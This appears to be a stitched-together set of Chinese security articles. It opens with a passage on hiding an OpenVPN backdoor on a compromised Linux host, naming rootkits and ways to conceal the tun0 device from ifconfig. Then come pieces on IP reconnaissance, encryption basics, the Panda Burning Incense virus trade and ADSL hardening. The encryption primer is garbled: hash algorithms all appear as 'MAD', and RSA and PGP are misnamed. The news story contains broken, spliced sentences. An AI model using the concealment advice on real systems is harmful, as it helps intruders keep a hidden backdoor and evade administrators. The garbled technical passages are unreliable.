A：sk2一装，用sk2的client进去启动openvpn，动态隐藏进程端口和网络连接。

B：adore，大概要改改才行，不过我暂时没这个需求，sk2已经很不错了。

C：shv5，最近抓到的一个rootkit，替换ELF文件的，很容易被查出来，没啥意思，他的特征是默认有个/usr/lib/libsh目录。

4：ifconfig

这个是最关键的也是最麻烦的，因为一般的人都会ifconfig敲着玩玩的，一不小心就会被发现多了个tun0。呵呵，我想了想办法有两：

A：使用awk or sed脚本替换/sbin/ifconfig，过滤掉tun0相关的输出，但这个比较容易被chkrootkit这样的东西发现，不过即使被人家用chkrootkit发现了也挺光荣的，至少用chkrootkit的人还稍微比较专业点，总比被人家ifconfig发现了好。

B：修改ifconfig的源程序，让他输出的时候不显示tunX设备，这个相对稳妥，因为一般检查ifconfig都是对比那混杂模式而已的，当然还有文件类型。

[root@RH9 root]# rpm -q --whatprovides /sbin/ifconfig

net-tools-1.60-12

查了一下，在这个软件包里，想改的自己可以改改，不想改的就去找找有没人改好的现成的了，就当留给我和各位有兴趣的朋友的家庭作业好了。

六、写在最后

信息安全是一把双刃剑，自己知道了可以尽可能怎么攻击，该怎么攻击，其中会有什么地方可以被发现，才有可能知道了人家想怎么攻击，会怎么攻击，也才有机会发现入侵企图或入侵者，进而把入侵者赶出去或拦在门外，否则被人家root了几年还不知道怎么回事。

教你知道黑客侦察和隐藏IP地址的方法

作者：iqmx　来源：赛迪网安全社区

在正式进行各种“黑客行为”之前，黑客会采取各种手段，探测(也可以说“侦察”)对方的主机信息，以便决定使用何种最有效的方法达到自己的目的。

来看看黑客是如何获知最基本的网络信息——对方的IP地址；以及用户如何防范自己的IP泄漏。

获取IP

“IP”作为Net用户的重要标示，是黑客首先需要了解的。获取的方法较多，黑客也会因不同的网络情况采取不同的方法，如：在局域网内使用Ping指令，Ping对方在网络中的名称而获得IP；在Internet上使用IP版的QQ直接显示。而最“牛”，也是最有效的办法是截获并分析对方的网络数据包。用Windows 2003的网络监视器捕获的网络数据包，可能一般的用户比较难看懂这些16进制的代码，而对于了解网络知识的黑客，他们可以找到并直接通过软件解析截获后的数据包的IP包头信息，再根据这些信息了解具体的IP。

隐藏IP

虽然侦察IP的方法多样，但用户可以隐藏IP的方法同样多样。就拿对付最有效的“数据包分析方法”而言，就可以安装能够自动去掉发送数据包包头IP信息的“Norton Internet Security 2003”。不过使用“Norton Internet Security”有些缺点，譬如：它耗费资源严重，降低计算机性能；在访问一些论坛或者网站时会受影响；不适合网吧用户使用等等。现在的个人用户采用最普及隐藏IP的方法应该是使用代理，由于使用代理服务器后，“转址服务”会对发送出去的数据包有所修改，致使“数据包分析”的方法失效。一些容易泄漏用户IP的网络软件(QQ、MSN、IE等)都支持使用代理方式连接Internet，特别是QQ使用“ezProxy”等代理软件连接后，IP版的QQ都无法显示该IP地址。

这里笔者介绍一款比较适合个人用户的简易代理软件——网络新手IP隐藏器，只要在“代理服务器”和“代理服务器端”填入正确的代理服务器地址和端口，即可对http使用代理，比较适合由于IE和QQ泄漏IP的情况。

不过使用代理服务器，同样有一些缺点，如：会影响网络通讯的速度；需要网络上的一台能够提供代理能力的计算机，如果用户无法找到这样的代理服务器就不能使用代理(查找代理服务器时，可以使用“代理猎手”等工具软件扫描网络上的代理服务器)。

虽然代理可以有效地隐藏用户IP，但高深的黑客亦可以绕过代理，查找到对方的真实IP地址，用户在何种情况下使用何种方法隐藏IP，也要因情况而论。

保护好数据 了解加密技术的具体内容

保护好数据　了解加密技术的具体内容

作者：王达　来源：赛迪网安全社区

随着网络技术的发展，网络安全也就成为当今网络社会的焦点中的焦点，几乎没有人不在谈论网络上的安全问题，病毒、黑客程序、邮件炸弹、远程侦听等这一切都无不让人胆战心惊。病毒、黑客的猖獗使身处今日网络社会的人们感觉到谈网色变，无所适从。

但我们必需清楚地认识到，这一切一切的安全问题我们不可一下全部找到解决方案，况且有的是根本无法找到彻底的解决方案，如病毒程序，因为任何反病毒程序都只能在新病毒发现之后才能开发出来，目前还没有哪能一家反病毒软件开发商敢承诺他们的软件能查杀所有已知的和未知的病毒，所以我们不能有等网络安全了再上网的念头，因为或许网络不能有这么一日，就象“矛”与“盾”，网络与病毒、黑客永远是一对共存体。

现代的电脑加密技术就是适应了网络安全的需要而应运产生的，它为我们进行一般的电子商务活动提供了安全保障，如在网络中进行文件传输、电子邮件往来和进行合同文本的签署等。其实加密技术也不是什么新生事物，只不过应用在当今电子商务、电脑网络中还是近几年的历史。下面我们就详细介绍一下加密技术的方方面面，希望能为那些对加密技术还一知半解的朋友提供一个详细了解的机会！

一、加密的由来

加密作为保障数据安全的一种方式，它不是现在才有的，它产生的历史相当久远，它是起源于要追溯于公元前2000年（几个世纪了），虽然它不是现在我们所讲的加密技术（甚至不叫加密），但作为一种加密的概念，确实早在几个世纪前就诞生了。当时埃及人是最先使用特别的象形文字作为信息编码的，随着时间推移，巴比伦、美索不达米亚和希腊文明都开始使用一些方法来保护他们的书面信息。

近期加密技术主要应用于军事领域，如美国独立战争、美国内战和两次世界大战。最广为人知的编码机器是German Enigma机，在第二次世界大战中德国人利用它创建了加密信息。此后，由于Alan Turing和Ultra计划以及其他人的努力，终于对德国人的密码进行了破解。当初，计算机的研究就是为了破解德国人的密码，人们并没有想到计算机给今天带来的信息革命。随着计算机的发展，运算能力的增强，过去的密码都变得十分简单了，于是人们又不断地研究出了新的数据加密方式，如利用ROSA算法产生的私钥和公钥就是在这个基础上产生的。

二、加密的概念

数据加密的基本过程就是对原来为明文的文件或数据按某种算法进行处理，使其成为不可读的一段代码，通常称为“密文”，使其只能在输入相应的密钥之后才能显示出本来内容，通过这样的途径来达到保护数据不被非法人窃取、阅读的目的。该过程的逆过程为解密，即将该编码信息转化为其原来数据的过程。

三、加密的理由

当今网络社会选择加密已是我们别无选择，其一是我们知道在互联网上进行文件传输、电子邮件商务往来存在许多不安全因素，特别是对于一些大公司和一些机密文件在网络上传输。而且这种不安全性是互联网存在基础——TCP/IP协议所固有的，包括一些基于TCP/IP的服务；另一方面，互联网给众多的商家带来了无限的商机，互联网把全世界连在了一起，走向互联网就意味着走向了世界，这对于无数商家无疑是梦寐以求的好事，特别是对于中小企业。为了解决这一对矛盾、为了能在安全的基础上大开这通向世界之门，我们只好选择了数据加密和基于加密技术的数字签名。

加密在网络上的作用就是防止有用或私有化信息在网络上被拦截和窃取。一个简单的例子就是密码的传输，计算机密码极为重要，许多安全防护体系是基于密码的，密码的泄露在某种意义上来讲意味着其安全体系的全面崩溃。

通过网络进行登录时，所键入的密码以明文的形式被传输到服务器，而网络上的窃听是一件极为容易的事情，所以很有可能黑客会窃取得用户的密码，如果用户是Root用户或Administrator用户，那后果将是极为严重的。

还有如果你公司在进行着某个招标项目的投标工作，工作人员通过电子邮件的方式把他们单位的标书发给招标单位，如果此时有另一位竞争对手从网络上窃取到你公司的标书，从中知道你公司投标的标的，那后果将是怎样，相信不用多说聪明的你也明白。

这样的例子实在是太多了，解决上述难题的方案就是加密，加密后的口令即使被黑客获得也是不可读的，加密后的标书没有收件人的私钥也就无法解开，标书成为一大堆无任何实际意义的乱码。总之无论是单位还是个人在某种意义上来说加密也成为当今网络社会进行文件或邮件安全传输的时代象征！

数字签名就是基于加密技术的，它的作用就是用来确定用户是否是真实的。应用最多的还是电子邮件，如当用户收到一封电子邮件时，邮件上面标有发信人的姓名和信箱地址，很多人可能会简单地认为发信人就是信上说明的那个人，但实际上伪造一封电子邮件对于一个通常人来说是极为容易的事。在这种情况下，就要用到加密技术基础上的数字签名，用它来确认发信人身份的真实性。

类似数字签名技术的还有一种身份认证技术，有些站点提供入站FTP和WWW服务，当然用户通常接触的这类服务是匿名服务，用户的权力要受到限制，但也有的这类服务不是匿名的，如某公司为了信息交流提供用户的合作伙伴非匿名的FTP服务，或开发小组把他们的Web网页上载到用户的WWW服务器上，现在的问题就是，用户如何确定正在访问用户的服务器的人就是用户认为的那个人，身份认证技术就是一个好的解决方案。

在这里需要强调一点的就是，文件加密其实不只用于电子邮件或网络上的文件传输，其实也可应用静态的文件保护，如PIP软件就可以对磁盘、硬盘中的文件或文件夹进行加密，以防他人窃取其中的信息。

四、两种加密方法

加密技术通常分为两大类：“对称式”和“非对称式”。

对称式加密就是加密和解密使用同一个密钥，通常称之为“Session Key ”这种加密技术目前被广泛采用，如美国政府所采用的DES加密标准就是一种典型的“对称式”加密法，它的Session Key长度为56Bits。

非对称式加密就是加密和解密所使用的不是同一个密钥，通常有两个密钥，称为“公钥”和“私钥”，它们两个必需配对使用，否则不能打开加密文件。这里的“公钥”是指可以对外公布的，“私钥”则不能，只能由持有人一个人知道。它的优越性就在这里，因为对称式的加密方法如果是在网络上传输加密文件就很难把密钥告诉对方，不管用什么方法都有可能被别窃听到。而非对称式的加密方法有两个密钥，且其中的“公钥”是可以公开的，也就不怕别人知道，收件人解密时只要用自己的私钥即可以，这样就很好地避免了密钥的传输安全性问题。

五、加密技术中的摘要函数（MAD、MAD和MAD）

摘要是一种防止改动的方法，其中用到的函数叫摘要函数。这些函数的输入可以是任意大小的消息，而输出是一个固定长度的摘要。摘要有这样一个性质，如果改变了输入消息中的任何东西，甚至只有一位，输出的摘要将会发生不可预测的改变，也就是说输入消息的每一位对输出摘要都有影响。总之，摘要算法从给定的文本块中产生一个数字签名（fingerprint或message digest），数字签名可以用于防止有人从一个签名上获取文本信息或改变文本信息内容和进行身份认证。摘要算法的数字签名原理在很多加密算法中都被使用，如SO/KEY和PIP（pretty good privacy）。

现在流行的摘要函数有MAD和MAD，但要记住客户机和服务器必须使用相同的算法，无论是MAD还是MAD，MAD客户机不能和MAD服务器交互。

MAD摘要算法的设计是出于利用32位RISC结构来最大其吞吐量，而不需要大量的替换表（substitution table）来考虑的。

MAD算法是以消息给予的长度作为输入，产生一个128位的"指纹"或"消息化"。要产生两个具有相同消息化的文字块或者产生任何具有预先给定"指纹"的消息，都被认为在计算上是不可能的。

MAD摘要算法是个数据认证标准。MAD的设计思想是要找出速度更快，比MAD更安全的一种算法，MAD的设计者通过使MAD在计算上慢下来，以及对这些计算做了一些基础性的改动来解决安全性这一问题，是MAD算法的一个扩展。

六、密钥的管理

密钥既然要求保密，这就涉及到密钥的管理问题，管理不好，密钥同样可能被无意识地泄露，并不是有了密钥就高枕无忧，任何保密也只是相对的，是有时效的。要管理好密钥我们还要注意以下几个方面：

1、密钥的使用要注意时效和次数

如果用户可以一次又一次地使用同样密钥与别人交换信息，那么密钥也同其它任何密码一样存在着一定的安全性，虽然说用户的私钥是不对外公开的，但是也很难保证私钥长期的保密性，很难保证长期以来不被泄露。如果某人偶然地知道了用户的密钥，那么用户曾经和另一个人交换的每一条消息都不再是保密的了。另外使用一个特定密钥加密的信息越多，提供给窃听者的材料也就越多，从某种意义上来讲也就越不安全了。

因此，一般强调仅将一个对话密钥用于一条信息中或一次对话中，或者建立一种按时更换密钥的机制以减小密钥暴露的可能性。

2、多密钥的管理

假设在某机构中有100个人，如果他们任意两人之间可以进行秘密对话，那么总共需要多少密钥呢？每个人需要知道多少密钥呢？也许很容易得出答案，如果任何两个人之间要不同的密钥，则总共需要4950个密钥，而且每个人应记住99个密钥。如果机构的人数是1000、10000人或更多，这种办法就显然过于愚蠢了，管理密钥将是一件可怕的事情。

Kerberos提供了一种解决这个较好方案，它是由MIT发明的，使保密密钥的管理和分发变得十分容易，但这种方法本身还存在一定的缺点。为能在因特网上提供一个实用的解决方案，Kerberos建立了一个安全的、可信任的密钥分发中心（Key Distribution Center，KDC），每个用户只要知道一个和KDC进行会话的密钥就可以了，而不需要知道成百上千个不同的密钥。

假设用户甲想要和用户乙进行秘密通信，则用户甲先和KDC通信，用只有用户甲和KDC知道的密钥进行加密 ，用户甲告诉KDC他想和用户乙进行通信，KDC会为用户甲和用户乙之间的会话随机选择一个对话密钥，并生成一个标签，这个标签由KDC和用户乙之间的密钥进行加密，并在用户甲启动和用户乙对话时，用户甲会把这个标签交给用户乙。这个标签的作用是让用户甲确信和他交谈的是用户乙，而不是冒充者。因为这个标签是由只有用户乙和KDC知道的密钥进行加密的，所以即使冒充者得到用户甲发出的标签也不可能进行解密，只有用户乙收到后才能够进行解密，从而确定了与用户甲对话的人就是用户乙。

当KDC生成标签和随机会话密码，就会把它们用只有用户甲和KDC知道的密钥进行加密，然后把标签和会话钥传给用户甲，加密的结果可以确保只有用户甲能得到这个信息，只有用户甲能利用这个会话密钥和用户乙进行通话。同理，KDC会把会话密码用只有KDC和用户乙知道的密钥加密，并把会话密钥给用户乙。

用户甲会启动一个和用户乙的会话，并用得到的会话密钥加密自己和用户乙的会话，还要把KDC传给它的标签传给用户乙以确定用户乙的身份，然后用户甲和用户乙之间就可以用会话密钥进行安全的会话了，而且为了保证安全，这个会话密钥是一次性的，这样黑客就更难进行破解了。同时由于密钥是一次性由系统自动产生的，则用户不必记那么多密钥了，方便了人们的通信。

七、数据加密的标准

最早、最著名的保密密钥或对称密钥加密算法DES(Data Encryption Standard)是由IBM公司在70年代发展起来的，并经政府的加密标准筛选后，于1976年11月被美国政府采用，DES随后被美国国家标准局和美国国家标准协会（American National Standard Institute，ANSI）承认。 DES使用56位密钥对64位的数据块进行加密，并对64位的数据块进行16轮编码。与每轮编码时，一个48位的"每轮"密钥值由56位的完整密钥得出来。DES用软件进行解码需用很长时间，而用硬件解码速度非常快。幸运的是，当时大多数黑客并没有足够的设备制造出这种硬件设备。在1977年，人们估计要耗资两千万美元才能建成一个专门计算机用于DES的解密，而且需要12个小时的破解才能得到结果。当时DES被认为是一种十分强大的加密方法。

随着计算机硬件的速度越来越快，制造一台这样特殊的机器的花费已经降到了十万美元左右，而用它来保护十亿美元的银行，那显然是不够保险了。另一方面，如果只用它来保护一台普通服务器，那么DES确实是一种好的办法，因为黑客绝不会仅仅为入侵一个服务器而花那么多的钱破解DES密文。

另一种非常著名的加密算法就是RSA了，RSA(Rivest-Shamir-Adleman)算法是基于大数不可能被质因数分解假设的公钥体系。简单地说就是找两个很大的质数。一个对外公开的为“公钥”（Prblic key） ，另一个不告诉任何人，称为"私钥”（Private key）。这两个密钥是互补的，也就是说用公钥加密的密文可以用私钥解密，反过来也一样。

假设用户甲要寄信给用户乙，他们互相知道对方的公钥。甲就用乙的公钥加密邮件寄出，乙收到后就可以用自己的私钥解密出甲的原文。由于别人不知道乙的私钥，所以即使是甲本人也无法解密那封信，这就解决了信件保密的问题。另一方面，由于每个人都知道乙的公钥，他们都可以给乙发信，那么乙怎么确信是不是甲的来信呢？那就要用到基于加密技术的数字签名了。

甲用自己的私钥将签名内容加密，附加在邮件后，再用乙的公钥将整个邮件加密（注意这里的次序，如果先加密再签名的话，别人可以将签名去掉后签上自己的签名，从而篡改了签名）。这样这份密文被乙收到以后，乙用自己的私钥将邮件解密，得到甲的原文和数字签名，然后用甲的公钥解密签名，这样一来就可以确保两方面的安全了。

八、加密技术的应用

加密技术的应用是多方面的，但最为广泛的还是在电子商务和VPN上的应用，下面就分别简叙。

1、在电子商务方面的应用

电子商务（E-business）要求顾客可以在网上进行各种商务活动，不必担心自己的信用卡会被人盗用。在过去，用户为了防止信用卡的号码被窃取到，一般是通过电话订货，然后使用用户的信用卡进行付款。现在人们开始用RSA（一种公开/私有密钥）的加密技术，提高信用卡交易的安全性，从而使电子商务走向实用成为可能。

许多人都知道NETSCAPE公司是Internet商业中领先技术的提供者，该公司提供了一种基于RSA和保密密钥的应用于因特网的技术，被称为安全插座层（Secure Sockets Layer，SSL）。

也许很多人知道Socket，它是一个编程界面，并不提供任何安全措施，而SSL不但提供编程界面，而且向上提供一种安全的服务，SSL3.0现在已经应用到了服务器和浏览器上，SSL2.0则只能应用于服务器端。

SSL3.0用一种电子证书（electric certificate）来实行身份进行验证后，双方就可以用保密密钥进行安全的会话了。它同时使用“对称”和“非对称”加密方法，在客户与电子商务的服务器进行沟通的过程中，客户会产生一个Session Key，然后客户用服务器端的公钥将Session Key进行加密，再传给服务器端，在双方都知道Session Key后，传输的数据都是以Session Key进行加密与解密的，但服务器端发给用户的公钥必需先向有关发证机关申请，以得到公证。

基于SSL3.0提供的安全保障，用户就可以自由订购商品并且给出信用卡号了，也可以在网上和合作伙伴交流商业信息并且让供应商把订单和收货单从网上发过来，这样可以节省大量的纸张，为公司节省大量的电话、传真费用。在过去，电子信息交换（Electric Data Interchange，EDI）、信息交易（information transaction）和金融交易（financial transaction）都是在专用网络上完成的，使用专用网的费用大大高于互联网。正是这样巨大的诱惑，才使人们开始发展因特网上的电子商务，但不要忘记数据加密。

2、加密技术在VPN中的应用

现在，越多越多的公司走向国际化，一个公司可能在多个国家都有办事机构或销售中心，每一个机构都有自己的局域网LAN（Local Area Network），但在当今的网络社会人们的要求不仅如此，用户希望将这些LAN连结在一起组成一个公司的广域网，这个在现在已不是什么难事了。

事实上，很多公司都已经这样做了，但他们一般使用租用专用线路来连结这些局域网 ，他们考虑的就是网络的安全问题。现在具有加密/解密功能的路由器已到处都是，这就使人们通过互联网连接这些局域网成为可能，这就是我们通常所说的虚拟专用网（Virtual Private Network ，VPN）。当数据离开发送者所在的局域网时，该数据首先被用户湍连接到互联网上的路由器进行硬件加密，数据在互联网上是以加密的形式传送的，当达到目的LAN的路由器时，该路由器就会对数据进行解密，这样目的LAN中的用户就可以看到真正的信息了。

"熊猫烧香"黑色产业揭秘 比房产获利快

"熊猫烧香"黑色产业揭秘 比房产获利快

新京报 【转载】 作者：吕宗恕

“熊猫烧香”案，中国首例利用网络病毒盗号牟利的网络案件。中了该病毒的电脑内部会生成带有熊猫图案的文件，盗号者追寻这些图案，利用木马等盗号软件，盗取电脑里的游戏账号密码，取得虚拟货币进行买卖。

2月3日，该病毒的制造者李俊落网。警方在此案背后发现了一个制“毒”、卖“毒”、传“毒”、盗账号、倒装备、换钱币的全新地下产业。一名涉案人员说，该产业的利润率高于目前的房地产。

而目前还没有一部完善的法律来约束病毒制造和传播，更无法来保护网络虚拟钱币的安全。现在对李俊如何量刑或将是个法律难题。

李俊在2004年就曾编写过盗号软件，这次利用“熊猫”病毒获利暴露出了地下黑客产业的完整形态。本报记者吕宗恕

湖北仙桃警方告诉记者，根据李俊交代，他曾将“熊猫烧香”病毒出售给120余人，而被抓获的主要嫌疑人仅有6人，所以不断会有“熊猫烧香”病毒的新变种出现。

胡红义，仙桃市公安局网监大队教导员，在和李俊交谈后发现，“熊猫烧香”背后还有一个通过病毒盗取游戏装备再倒卖的黑色产业链。

李俊处于链条的上端，其在被抓捕前，不到一个月的时间至少获利15万元。胡红义说，而在链条下端的张顺目前已获利数十万了。

胡红义说，现在如何对李俊等人量刑将会是个难题。根据法律，制造传播病毒者，要以后果严重程度来量刑，但很难衡量“熊猫烧香”病毒所导致的后果。而病毒所盗取的是“虚拟财物”，就不构成“盗窃罪”，这可能导致李俊之外的很多嫌疑人量刑很轻或定罪困难。

卖病毒一年可买别墅

李俊在不到一个月的时间内就靠病毒牟利15万，一位反病毒专家说，李俊一年的获利就可买一幢别墅。

李俊和人说话时声音很小，回答问题速度很慢。他说，编写病毒原先不是出于商业目的。原始的“熊猫烧香”并不具有盗号功能。在根据网友要求修改了病毒后，来找他买程序的人才越来越多。

熟悉此案的胡红义说，根据警方掌握的情况，李俊烧香“的不同变种达到自己的最终需求。

凡是被“熊猫烧香”病毒感染的计算机就变成了“肉鸡”，即失去一切信息保护能力。于是，游戏账号和密码、QQ号码都被一封电子邮件传送到盗取者的电脑里。

盗取者就能轻易获取游戏账号里的虚拟货币。

李俊说，他先后在网上以每个病毒500元至1000元的价格出售病毒近20套。

当李俊和张顺接洽上后，张顺每天给李俊账上汇3500元，后来每天汇6000元。

直至被抓捕前，在总计不到一个月时间，李俊至少牟利15万元。

江民公司反病毒专家何公道在接受媒体采访时说，只要“熊猫烧香”作者愿意，他一年之内可以买一座别墅。

“漂白”网络黑钱

从制作病毒到贩卖病毒，在虚拟世界中已形成一条完整的产业链。

有了大量盗窃来的游戏装备、账号，并不能马上兑换成人民币。办案民警说，只有通过网上交易，这些虚拟货币才得以兑现。

胡红义介绍，盗来的游戏装备、账号、QQ账号甚至银行卡号资料被中间批发商全部放在网上游戏交易平台公开叫卖。一番讨价还价后，网友们通过网上银行将现金转账，就能获得那些盗来的网络货币。

这样原先的虚拟货币就变成了现实世界中的货币。装备，“他们这些网站可以称为盗号、买卖一条龙，现在看来熊猫烧香的背景远没有那么简单。”《瑞星2006年安全报告》为“熊猫烧香”整理出了一个完整的产业链。

首先编写病毒，然后攻击网站植入病毒，当用户感染(机器被黑客控制，构成僵尸网络Botnet)，再窃取用户资料，最后在网上出售。在链条的每一个环节上都能产生巨大的经济利益。

厨师出身的王磊和李俊同处链条上端，他贩卖“熊猫烧香”病毒不足一个月，用赚的钱就已购买了一辆吉普车。

被“熊猫烧香”病毒控制的电脑会自动访问收费网站。据湖北省公安厅估算，一年会有数以百万计的访问量，能为那些收费网站提供数千万元的利润。张顺就通过“卖流量”获利数十万元。

比房地产获利快

在浙江丽水形成一个分工明晰的高利润病毒产业，有专人负责种植病毒，专人负责兑换QQ钱币。

李俊承认，这种通过病毒程序盗窃网络装备、货币的事，在虚拟的网络中早已存在，并在不断发展，甚至已经发展成为了一种并不合法的黑色产业。其中不乏一些在校的大学生，他们通过盗窃来的游戏账号、装备经交易后洗钱。

据仙桃警方办案人员透计算机病毒作者常常以获取经济利益为目标，之前出现的网银大盗、证券大盗、游戏大盗、QQ大盗等都是如此。

其中被江民公司截获的“证券大盗”三人犯罪团伙利用病毒程序，在不到2个月时间里，截获股民股票账户、密码，盗买、盗卖股票价值1141.9万元，非法获利38.6万元。而案发前，他们三人均有明确分工，配合密切。

李俊的同伙王磊说，从他们目前掌握的情况看，现在很多网民的电脑操作系统都留有后门，也没有及时下载补丁程序，甚至连必要的病毒防火墙也没有，因此，他们能轻松潜入进去。另外，一些大型商业网站、银行金融等部门的网络同样存在漏洞，其防范手段远远跟不上黑客技术的飞速发展，所以，账号被盗、密码丢失也就不稀奇了。

“熊猫烧香”如此巨大的传播范围，只要作者将病毒作一些小小改动，盗取中毒电脑上的网上银行密码、网络游戏虚拟装备等将易如反掌。

在“熊猫烧香”案中的涉案人员说，电脑病毒牟利产业已经是一个“比房地产获利更快，更容易的新型产业”。

亟须完善网络立法

仙桃公安局张良耀说，目前对网络立法明显滞后，如何保障网络虚拟财物还是个空白。

对于中国目前的网络信息安全现状，胡红义并国家金融、安全等信息系统之后再去加强安全监管，就为时太晚了！“胡红义还说，现在一些年轻人上网目的已经开始发生变化，从单纯的好玩变成了有经济目的，他们甚至通过网络漏洞牟利。一旦上网就想炫耀自己的水平，证明自己的电脑实力，因此，设法制造破坏。

“尽管网络是虚拟的，但已经形成一个社会，因此网络公德应该引起重视，不要以为在上网做了什么别人不会知道，那永远是错的。制造传播病毒其实是有迹可寻的。”胡红义说。

有人说，“李俊是一个网络天才”。一些网友甚至留言说：“今后他找工作不用愁了，只需要说‘熊猫烧香’就行了。”很多不法分子铤而走险“制毒、卖毒”，实际就是想钻法律的空子。仙桃市公安局网监大队副大队长张良耀说，除了下载补丁、升级杀毒软件外，有关网络立法也尤其重要。

犯罪嫌疑人抓到了，如何定罪量刑呢？张良耀说，根据法律，制造传播病毒者，要根据后果严重程度量刑，可“熊猫烧香”病毒导致的后果该如何衡量？受害人数以百万计，怎么可能一一来举证？其次，被盗的物品多是游戏装备等“虚拟财物”，即使大家都知道一个装备值1万元，但只要还没成为现实货币，就不构成“盗窃罪”，这可能导致李俊之外的很多嫌疑人量刑很轻或定罪困难。

-链接

“熊猫烧香”案取证难题

尽管李俊已到案，但有关网络取证等问题并不那么简单。如何证明所有中毒用户的"熊猫烧香"和变种病毒为李俊所写并传播的，一度成为警方取证难题。

仙桃市公安局网监大队教导员胡红义介绍，"熊猫病毒"等这些源代码都是电子数据文件，不像枪击的弹道痕、血迹、脚印等可以固定或者展示，且这些源代码很容易修改，给警方取证带来困难。

网络取证对设备的要求也很高，电子数据文件往往与特定的环境、时间、空间相关联。

因而很多时候还需要现场环境的取证，这势必对证据的真实性提出更高的要求。

此种情况下，仙桃警方将李俊电脑中提取的病毒样本送往国家计算机病毒应急处理中心鉴定，另外，从山东、浙江等处查获的涉案电脑，也被警方带回到湖北，以期进一步送检，来证明病毒和变种确为李俊所写和传播。

此外，他们电脑中还存有一些网络交谈记录，以期证实他们之间的关联。

据介绍，目前湖北检法机关已提前介入此案。

来自内部人士的消息说，因为此案为第一例计算机病毒牟利案，还没有审判网络制毒、传毒案的经验，提前介入便于更进一步全面了解此案的相关细节，做好取证工作。

ADSL防御黑客攻击的十大方法

ADSL防御黑客攻击的十大方法

目前，使用ADSL的用户越来越多，由于ADSL用户在线时间长、速度快，因此成为黑客们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”，要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢？不妨看看以下方法。

　　一、取消文件夹隐藏共享

　　如果你使用了Windows 2000/XP系统，右键单击C盘或者其他盘，选择"共享"，你会惊奇地发现它已经被设置为“共享该文件夹”，而在“网上邻居”中却看不到这些内容，这是怎么回事呢？

　　原来，在默认状态下，Windows 2000/XP会开启所有分区的隐藏共享，从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”，就可以看到硬盘上的每个分区名后面都加了一个“$”。但是只要键入“\\计算机名或者IP\C$”，系统就会询问用户名和密码，遗憾的是，大多数个人用户系统Administrator的密码都为空，入侵者可以轻易看到C盘的内容，这就给网络安全带来了极大的隐患。

　　怎么来消除默认共享呢？方法很简单，打开注册表编辑器，进入“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Sevices\Lanmanworkstation\parameters”，新建一个名为“AutoShareWKs”的双字节值，并将其值设为“0”，然后重新启动电脑，这样共享就取消了。

　　二、拒绝恶意代码

　　恶意网页成了宽带的最大威胁之一。以前使用Modem，因为打开网页的速度慢，在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快，所以很容易就被恶意网页攻击。

　　一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些小程序，只要打开该网页就会被运行。所以要避免恶意网页的攻击只要禁止这些恶意代码的运行就可以了。

　　运行IE浏览器，点击“工具/Internet选项/安全/自定义级别”，将安全级别定义为“安全级-高”，对“ActiveX控件和插件”中第2、3项设置为“禁用”，其它项设置为“提示”，之后点击“确定”。这样设置后，当你使用IE浏览网页时，就能有效避免恶意网页中恶意代码的攻击。

　　三、封死黑客的“后门”

　　俗话说“无风不起浪”，既然黑客能进入，那说明系统一定存在为他们打开的“后门”，只要堵死这个后门，让黑客无处下手，便无后顾之忧！

　　1.删掉不必要的协议

　　对于服务器和主机来说，一般只安装TCP/IP协议就够了。鼠标右击“网络邻居”，选择“属性”，再鼠标右击“本地连接”，选择“属性”，卸载不必要的协议。其中NETBIOS是很多安全缺陷的根源，对于不需要提供文件和打印共享的主机，还可以将绑定在TCP/IP协议的NETBIOS关闭，避免针对NETBIOS的攻击。选择“TCP/IP协议/属性/高级”，进入“高级TCP/IP设置”对话框，选择“WINS”标签，勾选“禁用TCP/IP上的NETBIOS”一项，关闭NETBIOS。

　　2.关闭“文件和打印共享”

　　文件和打印共享应该是一个非常有用的功能，但在不需要它的时候，也是黑客入侵的很好的安全漏洞。所以在没有必要“文件和打印共享”的情况下，我们可以将它关闭。用鼠标右击“网络邻居”，选择“属性”，然后单击“文件和打印共享”按钮，将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。

　　虽然“文件和打印共享”关闭了，但是还不能确保安全，还要修改注册表，禁止它人更改“文件和打印共享”。打开注册表编辑器，选择“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NetWork”主键，在该主键下新建DWORD类型的键值，键值名为“NoFileSharingControl”，键值设为“1”表示禁止这项功能，从而达到禁止更改“文件和打印共享”的目的；键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。

　　3.把Guest账号禁用

　　有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具，那还是禁止的好。打开控制面板，双击“用户和密码”，单击“高级”选项卡，再单击“高级”按钮，弹出本地用户和组窗口。在Guest账号上面点击右键，选择属性，在“常规”页中选中“账户已停用”。另外，将Administrator账号改名可以防止黑客知道自己的管理员账号，这会在很大程度上保证计算机安全。

　　4.禁止建立空连接

　　在默认的情况下，任何用户都可以通过空连接连上服务器，枚举账号并猜测密码。因此，我们必须禁止建立空连接。方法有以下两种：

　　方法一是修改注册表：打开注册表“HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA”，将DWORD值“RestrictAnonymous”的键值改为“1”即可。

　　最后建议大家给自己的系统打上补丁，微软那些没完没了的补丁还是很有用的！
四、隐藏IP地址

　　黑客经常利用一些网络探测技术来查看我们的主机信息，主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念，如果攻击者知道了你的IP地址，等于为他的攻击准备好了目标，他可以向这个IP发动各种进攻，如DoS(拒绝服务)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。

　　与直接连接到Internet相比，使用代理服务器能保护上网用户的IP地址，从而保障上网安全。代理服务器的原理是在客户机（用户上网的计算机）和远程服务器（如用户想访问远端WWW服务器）之间架设一个“中转站”，当客户机向远程服务器提出服务要求后，代理服务器首先截取用户的请求，然后代理服务器将服务请求转交远程服务器，从而实现客户机和远程服务器之间的联系。很显然，使用代理服务器后，其它用户只能探测到代理服务器的IP地址而不是用户的IP地址，这就实现了隐藏用户IP地址的目的，保障了用户上网安全。提供免费代理服务器的网站有很多，你也可以自己用代理猎手等工具来查找。　

　　五、关闭不必要的端口

